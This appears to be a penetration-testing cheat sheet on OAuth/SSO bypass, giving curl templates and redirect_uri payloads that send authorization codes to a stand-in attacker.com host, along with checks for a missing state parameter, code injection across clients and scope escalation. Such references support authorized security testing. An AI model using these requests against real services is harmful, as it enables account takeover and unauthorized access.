OAuth/SSO Bypass


CWE	CWE-287
Tools	burp, jwt_tool
Difficulty	🔴 advanced

Exploit OAuth/SSO Flaws

Redirect via Open Redirect in redirect_uri

curl "https://TARGET/oauth/authorize?\
client_id=valid&\
redirect_uri=https://attacker.com/callback&\
response_type=code&\
scope=openid"

Bypass techniques:

Path manipulation: redirect_uri=https://target.com.attacker.com
Subdomain: redirect_uri=https://attacker.target.com
URL encoding: redirect_uri=https://target.com%2F@attacker.com
Open redirect chain: redirect_uri=https://target.com/redirect?url=https://attacker.com

Exploit Missing State Parameter (CSRF)

# Check if state parameter is required and validated
curl "https://TARGET/oauth/authorize?\
client_id=valid&\
redirect_uri=https://target.com/callback&\
response_type=code"

# If state is optional or not validated:
# - CSRF to link attacker's OAuth account to victim's account
# - Force victim to authenticate with attacker's credentials

Inject Authorization Codes

# Obtain authorization code for one client, try with a different client_id
code="obtained_code"
curl -X POST "https://TARGET/oauth/token" \
    -d "grant_type=authorization_code" \
    -d "code=$code" \
    -d "client_id=different_client" \
    -d "client_secret=different_secret"

Escalate OAuth Scopes

# Request elevated scopes beyond what the client is authorized for
curl "https://TARGET/oauth/authorize?\
client_id=valid&\
scope=openid+admin+write+delete&\
response_type=code"

# Check if requested scope is enforced or silently granted

Exploit OAuth/SSO Flaws​

Redirect via Open Redirect in redirect_uri​

Exploit Missing State Parameter (CSRF)​

Inject Authorization Codes​

Escalate OAuth Scopes​

Exploit OAuth/SSO Flaws

Redirect via Open Redirect in redirect_uri

Exploit Missing State Parameter (CSRF)

Inject Authorization Codes

Escalate OAuth Scopes